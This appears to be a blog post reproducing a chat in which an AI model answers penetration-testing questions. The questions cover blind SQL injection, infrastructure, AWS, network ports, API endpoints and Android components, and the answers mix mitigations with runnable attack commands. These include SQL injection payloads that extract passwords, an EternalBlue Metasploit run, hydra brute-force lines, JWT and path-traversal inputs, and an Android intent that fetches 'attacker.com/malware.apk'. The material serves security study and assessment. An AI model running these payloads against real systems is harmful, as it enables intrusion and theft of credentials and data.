- Get link
- X
- Other Apps
Penetration Testing — Full Chat History
claude.ai · Security Assessment Session
- 01 Blind SQL Injection – DB Dump
- 02 SQL Injection Queries Explained
- 03 SUBSTRING Function
- 04 Extract One User Step by Step
- 05 Infrastructure Pentesting
- 06 AWS Security Assessment
- 07 AWS Open SSH Port 0.0.0.0/0
- 08 Network Pentest — 4 Open Ports
- 09 API Endpoint /api/user/1001
- 10 Android Security Assessment
- 11 All Questions Summary
Can someone extract or dump a database if the server is vulnerable to blind SQL injection?
Blind SQL Injection – Database Extraction
Yes, an attacker can extract/dump a database through blind SQL injection, even without direct output. Here's how it works conceptually:
How Blind SQLi Works
In blind SQLi, the server returns no data directly — instead, attackers infer information by asking true/false questions to the database, observing differences in:
- Boolean-based: Page behavior changes (different content, errors, redirects)
- Time-based: Response delays (e.g., SLEEP(5) confirms true conditions)
The Extraction Process
1. Confirm Vulnerability
' AND 1=1-- → normal response ✓
' AND 1=2-- → different response ✓ (confirms blind SQLi)
2. Enumerate Database Metadata — character-by-character extraction:
' AND SUBSTRING(database(),1,1)='a'-- → true/false
' AND SUBSTRING(database(),1,1)='b'-- → true/false
...repeat for each character
3. Dump Table/Column Names
' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--
4. Extract Row Data
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
5. Time-Based (when no visual difference exists)
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--
Defenses
| Defense | How it helps |
|---|---|
| Parameterized queries / prepared statements | Eliminates injection entirely |
| Input validation & WAF | Blocks malicious payloads |
| Least privilege DB accounts | Limits what can be read even if exploited |
| Rate limiting | Slows down automated extraction |
| Error suppression | Removes timing/behavioral leaks |
The bottom line: blind SQLi is slower than standard SQLi but just as dangerous — a full database dump is absolutely achievable. Parameterized queries remain the only reliable prevention.
Can you tell me like what these queries are doing?
Query Breakdown
1. Confirm Vulnerability
' AND 1=1--
' AND 1=2--
- The
'closes the original string in the SQL query AND 1=1is always true → page loads normallyAND 1=2is always false → page behaves differently--comments out the rest of the original query
2. Extract Database Name
' AND SUBSTRING(database(),1,1)='a'--
database()→ returns the current database nameSUBSTRING(database(), 1, 1)→ extracts 1 character starting at position 1= 'a'→ asks "is the first character 'a'?"- Repeat for position 2, 3, 4... until full name is known
3. Extract Table Names
' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--
information_schema.tables→ a built-in MySQL table that lists all tablesSELECT table_name ... LIMIT 1→ picks the first table nameSUBSTRING(..., 1, 1) = 'u'→ asks "does the first table name start with 'u'?"
4. Extract Actual Data
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
SELECT password FROM users LIMIT 1→ grabs the first password- Repeat for each character position to reconstruct the full password
5. Time-Based
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--
IF(condition, true_action, false_action)→ standard if/else- If the first character is 'a' → SLEEP(5) (server pauses 5 seconds)
- Attacker measures response time to determine true/false
Summary
| Query | What it extracts |
|---|---|
1=1 vs 1=2 | Confirms injection exists |
SUBSTRING(database(),...) | Database name |
information_schema.tables | Table names |
SELECT password FROM users | Actual sensitive data |
IF(..., SLEEP(5), 0) | Same as above but via timing |
What is it extracting? (shared excerpt: "SUBSTRING(database(), 1, 1) → extracts 1 character starting at position 1 (first character)")
Breaking It Down
SUBSTRING(database(), 1, 1)
| Part | Meaning |
|---|---|
database() | Returns the name of the current database (e.g., "shopdb") |
First 1 | Start position — start from character number 1 (the beginning) |
Second 1 | Length — extract only 1 character |
Example
If the database name is "shopdb":
SUBSTRING("shopdb", 1, 1) → "s"
SUBSTRING("shopdb", 2, 1) → "h"
SUBSTRING("shopdb", 3, 1) → "o"
SUBSTRING("shopdb", 4, 1) → "p"
In blind SQL injection, the attacker pulls out the database name one character at a time by asking yes/no questions like "is this character equal to 's'?"
Suppose that you have found there is a parameter "user" that is vulnerable. How would you perform this — extract only one user from the database, step by step?
Scenario
You found that the user parameter is vulnerable:
https://example.com/profile?user=john
Step 1: Confirm the Injection
?user=john' AND 1=1-- → normal page ✓
?user=john' AND 1=2-- → different/broken page ✓
Confirmed vulnerable.
Step 2: Find the Database Name Length
?user=john' AND LENGTH(database())=6--
Try 1, 2, 3... until you get a true response.
Step 3: Extract Database Name Character by Character
?user=john' AND SUBSTRING(database(),1,1)='s'-- → true
?user=john' AND SUBSTRING(database(),2,1)='h'-- → true
?user=john' AND SUBSTRING(database(),3,1)='o'-- → true
?user=john' AND SUBSTRING(database(),4,1)='p'-- → true
?user=john' AND SUBSTRING(database(),5,1)='d'-- → true
?user=john' AND SUBSTRING(database(),6,1)='b'-- → true
✅ Database name = shopdb
Step 4: Find the Table Name
?user=john' AND SUBSTRING((SELECT table_name FROM information_schema.tables
WHERE table_schema='shopdb' LIMIT 1),1,1)='u'--
✅ Table name = users
Step 5: Find Column Names
?user=john' AND SUBSTRING((SELECT column_name FROM information_schema.columns
WHERE table_name='users' LIMIT 1),1,1)='i'--
✅ Columns found = id, username, password, email
Step 6: Extract One User's Data
Extract username:
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),2,1)='d'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),3,1)='m'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),4,1)='i'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),5,1)='n'--
✅ Username = admin
Extract password:
?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),2,1)='f'--
... and so on
Key Points
- Every
LIMIT 1ensures you're only targeting one row - Use
LIMIT 1 OFFSET 1for the second user,OFFSET 2for third --at the end comments out remaining SQL to prevent errors- Manually doing this takes hundreds of requests — tools like sqlmap automate this entirely
You are doing pentesting and you got infrastructure. How would you do infrastructure pentesting?
Infrastructure Pentesting Methodology
Phase 1: Reconnaissance
Passive Recon:
- WHOIS lookup → domain ownership, registrar info
- DNS enumeration → subdomains, MX records, NS records
- Google dorking → exposed files, login pages
- Shodan/Censys → open ports, banners, exposed services
- LinkedIn/job postings → tech stack hints
Active Recon:
- Ping sweeps → find live hosts
- DNS zone transfer attempts
- Banner grabbing → identify software versions
Phase 2: Scanning & Enumeration
# Discover live hosts
nmap -sn 192.168.1.0/24
# Full port scan
nmap -sV -sC -p- 192.168.1.10
# OS detection
nmap -O 192.168.1.10
| Port/Service | What to Enumerate |
|---|---|
| 21 (FTP) | Anonymous login, version |
| 22 (SSH) | Version, weak credentials |
| 25 (SMTP) | Open relay, user enumeration |
| 80/443 (HTTP/S) | Web tech, directories |
| 445 (SMB) | Shares, null sessions |
| 3306 (MySQL) | Remote access, default creds |
| 3389 (RDP) | Version, brute force |
Phase 3: Vulnerability Assessment
# Nikto web server scan
nikto -h http://192.168.1.10
# SMB vulnerabilities
nmap --script smb-vuln* 192.168.1.10
# Check CVEs
searchsploit apache 2.4.49
Phase 4: Exploitation
1. Unpatched services → known CVE exploits (Metasploit)
2. Weak credentials → brute force SSH, RDP, FTP
3. Misconfigured SMB → null sessions, exposed shares
4. Default credentials → routers, printers, admin panels
5. SSL/TLS issues → POODLE, Heartbleed, BEAST
6. Open ports → exposed internal services
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
run
Phase 5: Post-Exploitation
- Privilege escalation → get root/SYSTEM access
- Credential dumping → extract hashes (mimikatz)
- Lateral movement → pivot to other machines
- Persistence check → could attacker maintain access?
- Data access audit → what sensitive data is reachable?
- Network sniffing → intercept internal traffic
Phase 6: Lateral Movement
Initial Access
↓
Dump credentials / find SSH keys
↓
Use credentials on other machines
↓
Reach domain controller / core servers
↓
Full network compromise
Phase 7: Reporting
1. Executive Summary → high-level risk overview
2. Scope & Methodology → what was tested, how
3. Findings → each vuln with description,
risk rating, evidence, remediation
4. Attack Chain → how far you got step by step
5. Recommendations → prioritized fixes
Key Rules
- Always stay within agreed scope
- Get written authorization before starting
- Document everything as you go
- Never cause unnecessary disruption to live systems
- Follow responsible disclosure for critical findings
If you got AWS creds how would you do security assessment? Step by step?
AWS Security Assessment
Pre-requisites
# Install AWS CLI
pip install awscli
# Configure credentials
aws configure
# Enter: Access Key ID, Secret Access Key, Region
Phase 1: Identify Who You Are
# Who am I?
aws sts get-caller-identity
# Returns: Account ID, User ARN, User ID
Phase 2: Enumerate IAM Permissions
aws iam list-users
aws iam list-groups
aws iam list-attached-user-policies --user-name <username>
aws iam list-roles
aws iam list-user-policies --user-name <username>
# Tool: enumerate-iam
python enumerate-iam.py --access-key <key> --secret-key <secret>
Phase 3: S3 Bucket Assessment
aws s3 ls
aws s3 ls s3://bucket-name
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
aws s3api get-public-access-block --bucket bucket-name
aws s3api get-bucket-encryption --bucket bucket-name
aws s3api get-bucket-versioning --bucket bucket-name
Phase 4: EC2 Assessment
aws ec2 describe-instances
aws ec2 describe-security-groups
# Look for 0.0.0.0/0 rules
aws ec2 describe-security-groups \
--query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'
aws ec2 describe-snapshots --owner-ids self
Phase 5: IAM Deep Dive
aws iam get-account-password-policy
aws iam list-virtual-mfa-devices
aws iam list-access-keys --user-name <username>
aws iam list-entities-for-policy \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Phase 6: Network Assessment (VPC)
aws ec2 describe-vpcs
aws ec2 describe-subnets
aws ec2 describe-network-acls
aws ec2 describe-flow-logs
aws ec2 describe-internet-gateways
Phase 7: Logging & Monitoring
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail-name>
aws cloudwatch describe-alarms
aws guardduty list-detectors
Phase 8: Other Services
aws lambda list-functions
aws rds describe-db-instances
aws secretsmanager list-secrets
aws ssm describe-parameters
aws sqs list-queues
Phase 9: Privilege Escalation Checks
Common escalation paths:
- iam:CreatePolicyVersion → replace policy with admin policy
- iam:AttachUserPolicy → attach admin policy to self
- iam:PassRole + ec2:RunInstances → launch EC2 with admin role
- lambda:CreateFunction → run code as admin role
- sts:AssumeRole → assume more privileged role
# Tool: Pacu (AWS exploitation framework)
python3 pacu.py
Common Critical Findings
| Finding | Risk |
|---|---|
| Public S3 buckets with sensitive data | Critical |
| No MFA on root/admin accounts | Critical |
| CloudTrail disabled | High |
| SSH open to 0.0.0.0/0 | High |
| Old unused access keys | High |
| No GuardDuty | Medium |
| Unencrypted RDS/EBS | Medium |
| Overly permissive IAM roles | High |
If you got AWS this 0.0.0.0/0 TCP 22 — what are tests you perform and how do you mitigate?
What Does 0.0.0.0/0 TCP 22 Mean?
0.0.0.0/0 = ANY IP address in the world
TCP 22 = SSH port
Translation: Anyone on the internet can attempt to connect via SSH
Tests to Perform
1. Verify the Finding
aws ec2 describe-security-groups \
--query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`] && ToPort==`22`]]'
2. Check SSH is Running
nmap -sV -p 22 <public-ip>
3. Check CVEs
searchsploit openssh <version>
nmap --script ssh-vuln* -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
| CVE | Description | Risk |
|---|---|---|
| CVE-2023-38408 | Remote code execution | Critical |
| CVE-2016-6210 | User enumeration | Medium |
| CVE-2018-15473 | User enumeration | Medium |
| CVE-2019-6111 | SCP path traversal | Medium |
4. Auth Method Check
nmap --script ssh-auth-methods -p 22 <ip>
# Bad findings:
# - Password authentication enabled
# - Root login permitted
5. Brute Force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<ip> -t 4
medusa -h <ip> -u root -P rockyou.txt -M ssh
6. Check SSH Config (if access gained)
cat /etc/ssh/sshd_config
# Bad settings:
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
Protocol 1
Mitigation Steps
1. Restrict Security Group
# Remove the 0.0.0.0/0 rule
aws ec2 revoke-security-group-ingress \
--group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr 0.0.0.0/0
# Allow only YOUR IP
aws ec2 authorize-security-group-ingress \
--group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr <your-ip>/32
2. Disable Password Auth
PasswordAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
MaxAuthTries 3
Protocol 2
3. Use SSM Instead of SSH
aws ssm start-session --target <instance-id>
4. Enable Fail2Ban
[sshd]
enabled = true
maxretry = 3
bantime = 3600
5. Use Strong Keys
ssh-keygen -t ed25519 -C "your@email.com"
# or RSA 4096
ssh-keygen -t rsa -b 4096
Risk Rating
| Issue | Risk |
|---|---|
| SSH open to 0.0.0.0/0 | 🔴 Critical |
| Password auth enabled | 🔴 Critical |
| Root login permitted | 🔴 Critical |
| Old OpenSSH version | 🟠 High |
| No fail2ban | 🟠 High |
| No CloudWatch alerts | 🟡 Medium |
During network pentesting, nmap scan shows TCP22, TCP80, TCP443, TCP3389. What do you do? What are the test cases you will test?
TCP 22 — SSH
nmap -sV -p 22 <ip>
nmap --script ssh-auth-methods -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
hydra -L users.txt -P passwords.txt ssh://<ip>
searchsploit openssh <version>
Look for: Password auth enabled, root login, old version, weak algorithms, user enumeration
TCP 80 — HTTP
1. Fingerprint
nmap -sV -p 80 <ip>
curl -I http://<ip>
whatweb http://<ip>
2. Directory Enumeration
gobuster dir -u http://<ip> -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://<ip>
# Check: /admin /login /backup /config /.git /api /phpinfo.php
3. Vulnerability Scan
nikto -h http://<ip>
nmap --script http-vuln* -p 80 <ip>
4. CMS Scanning
wpscan --url http://<ip> --enumerate u,p,t # WordPress
joomscan -u http://<ip> # Joomla
droopescan scan drupal -u http://<ip> # Drupal
5. HTTP Methods
nmap --script http-methods -p 80 <ip>
curl -X OPTIONS http://<ip> -v
TCP 443 — HTTPS
All HTTP tests PLUS:
SSL/TLS Assessment
sslscan <ip>:443
testssl.sh <ip>
nmap --script ssl-enum-ciphers -p 443 <ip>
nmap --script ssl-heartbleed -p 443 <ip>
nmap --script ssl-poodle -p 443 <ip>
Certificate Analysis
openssl s_client -connect <ip>:443
# Check: expiry, self-signed, SHA1 vs SHA256, domain mismatch
Bad Protocols: SSLv2, SSLv3, TLS 1.0, TLS 1.1
Good Protocols: TLS 1.2 ✓, TLS 1.3 ✓
Security Headers to Check:
Strict-Transport-Security (HSTS)
Content-Security-Policy (CSP)
X-Frame-Options
X-Content-Type-Options
TCP 3389 — RDP
1. BlueKeep Check (Critical)
nmap --script rdp-vuln-ms12-020 -p 3389 <ip>
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run
2. Encryption & NLA Check
nmap --script rdp-enum-encryption -p 3389 <ip>
# If NLA not enforced → anyone can reach login screen
3. Brute Force
hydra -L users.txt -P passwords.txt rdp://<ip>
crowbar -b rdp -s <ip>/32 -u administrator -C passwords.txt
Complete Test Summary
| Port | Service | Key Tests | Critical Findings |
|---|---|---|---|
| 22 | SSH | Brute force, CVEs, auth methods | Password auth on, root login |
| 80 | HTTP | Nikto, gobuster, SQLi, CMS | Admin exposed, SQLi, default creds |
| 443 | HTTPS | SSL scan, cert check, HTTP tests | Heartbleed, weak TLS, no HSTS |
| 3389 | RDP | BlueKeep, brute force, NLA | BlueKeep vuln, no NLA |
Tools Summary
nmap · nikto · gobuster · wpscan · sslscan · testssl.sh · hydra · metasploit · searchsploit
What are test cases you perform on this endpoint /api/user/1001?
What This Endpoint Tells Us
/api/user/1001
↑
numeric ID → likely sequential → IDOR risk immediately
1. IDOR — Most Critical
GET /api/user/1000 # try other users
GET /api/user/1002
GET /api/user/1
GET /api/user/0
GET /api/user/-1
GET /api/user/99999999
2. HTTP Method Testing
GET /api/user/1001 → read
POST /api/user/1001 → create?
PUT /api/user/1001 → update
PATCH /api/user/1001 → partial update
DELETE /api/user/1001 → can you delete?
OPTIONS /api/user/1001 → what methods allowed?
3. Authentication Testing
# No token
GET /api/user/1001 (no Authorization header)
# Empty / invalid token
Authorization: Bearer
Authorization: Bearer invalidtoken123
# Expired token
Authorization: Bearer <old-expired-token>
4. Authorization / Privilege Escalation
# User B token accessing User A data
GET /api/user/1001
Authorization: Bearer <user_B_token>
# Role bypass via parameters
GET /api/user/1001?role=admin
GET /api/user/1001?admin=true
GET /api/user/1001?debug=true
5. SQL Injection
GET /api/user/1001'
GET /api/user/1001--
GET /api/user/1001 AND 1=1
GET /api/user/1001; SLEEP(5)--
GET /api/user/1001 UNION SELECT null,null,null--
GET /api/user/1001%27
6. Input Validation & Fuzzing
GET /api/user/abc
GET /api/user/null
GET /api/user/NaN
GET /api/user/<script>alert(1)</script>
GET /api/user/../../etc/passwd
GET /api/user/1001%00
GET /api/user/[1001]
7. Mass Assignment
PUT /api/user/1001
{
"username": "hacker",
"role": "admin", ← privilege escalation
"isAdmin": true,
"balance": 99999
}
8. Information Disclosure
# Check response for sensitive fields:
"password": "..." ← should NOT appear
"api_key": "sk-..." ← secret leak
"ssn": "..." ← PII
"credit_card": "..." ← critical
# Debug modes
GET /api/user/1001?debug=true
GET /api/user/1001?verbose=true
GET /api/user/1001.xml
9. Rate Limiting
ffuf -u http://target.com/api/user/FUZZ \
-w numbers.txt -mc 200
# No rate limit → can enumerate all users
10. JWT Testing
# Change alg to "none"
{"alg": "none", "typ": "JWT"}
# Modify payload
{"user_id": 1001, "role": "admin"}
# Tool
jwt_tool -t <token> -M at
11. Security Headers
curl -I http://target.com/api/user/1001
# Should be present:
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000
# Should NOT expose:
X-Powered-By: PHP/7.2
Server: Apache/2.4.1
Complete Test Summary
| Test | Tool | Risk if Vulnerable |
|---|---|---|
| IDOR | Burp, curl | Critical |
| Auth bypass | curl | Critical |
| SQLi | sqlmap, manual | Critical |
| Privilege escalation | Burp | Critical |
| Mass assignment | Burp | High |
| JWT attacks | jwt_tool | High |
| Rate limiting | ffuf, Burp | High |
| Info disclosure | curl | High |
| Input fuzzing | ffuf | Medium |
| Security headers | curl | Medium |
How do you do Android security assessment on the main Android components: Activities, Services, Broadcast Receivers, Content Provider?
Setup
# Tools needed
adb · apktool · jadx · frida · drozer · mobsf · burpsuite
# Connect device and pull APK
adb devices
adb shell pm list packages | grep target
adb pull /data/app/com.target.app/base.apk
Static Analysis First
apktool d target.apk -o output_folder
jadx -d output_folder target.apk
# Upload to MobSF for automated scan
# Key manifest flags to check:
android:debuggable="true" ← debug in prod
android:allowBackup="true" ← data extractable
android:exported="true" ← component exposed
android:usesCleartextTraffic="true" ← HTTP allowed
1. Activities
Activity = Screen/UI of the app (Login, Dashboard, Settings)
Static Analysis
cat AndroidManifest.xml | grep -A5 "activity"
# Look for android:exported="true"
Launch Exported Activities (Bypass Login)
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DashboardActivity
adb shell am start -n com.target.app/.ProfileActivity \
--es "user_id" "admin" --ez "isAdmin" true
# Drozer
dz> run app.activity.info -a com.target.app
dz> run app.activity.start --component com.target.app .AdminActivity
Intent Injection
adb shell am start -n com.target.app/.WebViewActivity \
-d "file:///etc/passwd"
adb shell am start -n com.target.app/.WebViewActivity \
--es "url" "javascript:alert(1)"
What to look for: Exported activities accessible without auth, login bypass, sensitive Intent extras, WebView with arbitrary URLs, task hijacking
2. Services
Service = Background process (music player, sync, upload)
Start/Stop Exported Services
adb shell am startservice -n com.target.app/.BackgroundService
adb shell am stopservice -n com.target.app/.BackgroundService
dz> run app.service.info -a com.target.app
dz> run app.service.start --component com.target.app .SyncService
Malicious Intent to Service
adb shell am startservice -n com.target.app/.DownloadService \
--es "url" "http://attacker.com/malware.apk" \
--es "filename" "../../data/data/com.target.app/evil"
Frida Hook
Java.perform(function() {
var SyncService = Java.use('com.target.app.SyncService')
SyncService.onStartCommand.implementation = function(intent, flags, startId) {
console.log('Service started with: ' + intent)
return this.onStartCommand(intent, flags, startId)
}
})
3. Broadcast Receivers
Receiver = Listens for events (BOOT_COMPLETED, SMS_RECEIVED, custom broadcasts)
Send Malicious Broadcasts
adb shell am broadcast -a com.target.app.RESET_PASSWORD \
-n com.target.app/.PasswordResetReceiver
adb shell am broadcast -a com.target.app.UPDATE_USER \
--es "role" "admin" --es "user_id" "1001"
# Fake payment confirmation
adb shell am broadcast -a com.target.app.PAYMENT_SUCCESS \
--es "order_id" "12345"
Sniff Broadcasts
dz> run app.broadcast.sniff --action com.target.app.USER_LOGGED_IN
# May leak: auth tokens, credentials, session IDs
What to look for: Sensitive actions triggered by any app, tokens leaked in broadcasts, payment manipulation, password reset without auth
4. Content Providers
Provider = Shared data store (Contacts, Media, custom DB)
Query Provider (Read Data)
adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users/1
dz> run app.provider.info -a com.target.app
dz> run app.provider.query content://com.target.app.provider/users
SQL Injection via Provider
# Projection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
--projection "* FROM sqlite_master--"
# Selection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
--selection "1=1"
# Automated scan
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.sqltables -a com.target.app
Insert / Update / Delete
adb shell content insert \
--uri content://com.target.app.provider/users \
--bind name:s:hacker --bind role:s:admin
adb shell content update \
--uri content://com.target.app.provider/users/1 \
--bind role:s:admin
Path Traversal
dz> run app.provider.read \
content://com.target.app.provider/../../../../data/data/com.target.app/databases/userdb.db
content://com.target.app.fileprovider/../shared_prefs/credentials.xml
content://com.target.app.fileprovider/../databases/app.db
Automated Scan
dz> run scanner.provider.finduris -a com.target.app
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.traversal -a com.target.app
Additional Checks
Data Storage
adb shell cat /data/data/com.target.app/shared_prefs/*.xml
adb shell sqlite3 /data/data/com.target.app/databases/app.db ".tables"
adb logcat | grep com.target.app
SSL Pinning Bypass
frida -U -f com.target.app -l ssl_pinning_bypass.js --no-pause
Complete Summary
| Component | Key Attack | Risk |
|---|---|---|
| Activity | Direct launch, bypass login | Critical |
| Service | Trigger sensitive background ops | High |
| Broadcast | Fake broadcasts, data intercept | High |
| Content Provider | SQLi, read full database | Critical |
| Data Storage | Read credentials, tokens | Critical |
| Network | MITM, intercept traffic | High |
Tools
MobSF · apktool · jadx · drozer · frida · adb · burpsuite · objection
Now give me all the questions I have asked you.
All Questions Asked — Summary
| # | Question | Topic |
|---|---|---|
| 01 | Can someone extract or dump a DB if the server is vulnerable to blind SQL injection? | SQL Injection |
| 02 | Can you tell me like what these queries are doing? | SQL Injection |
| 03 | What is it extracting? (SUBSTRING excerpt) | SQL Injection |
| 04 | Suppose the "user" parameter is vulnerable — extract only one user, step by step | SQL Injection |
| 05 | You are doing pentesting and got infrastructure — how would you do infrastructure pentesting? | Infrastructure |
| 06 | If you got AWS creds how would you do security assessment? Step by step? | AWS |
| 07 | If you got AWS 0.0.0.0/0 TCP 22 — what tests do you perform and how do you mitigate? | AWS / SSH |
| 08 | During network pentesting nmap shows TCP22, TCP80, TCP443, TCP3389 — what do you do? | Network Pentest |
| 09 | What are test cases you perform on endpoint /api/user/1001? | API Security |
| 10 | How do you do Android security assessment on Activities, Services, Broadcast Receivers, Content Provider? | Android |
| 11 | Now give me all the questions I have asked you. | Summary |
Total: 11 questions covering SQL Injection, Infrastructure Pentesting, AWS Security, Network Pentesting, API Security, and Android Security Assessment.
- Get link
- X
- Other Apps
Comments
Post a Comment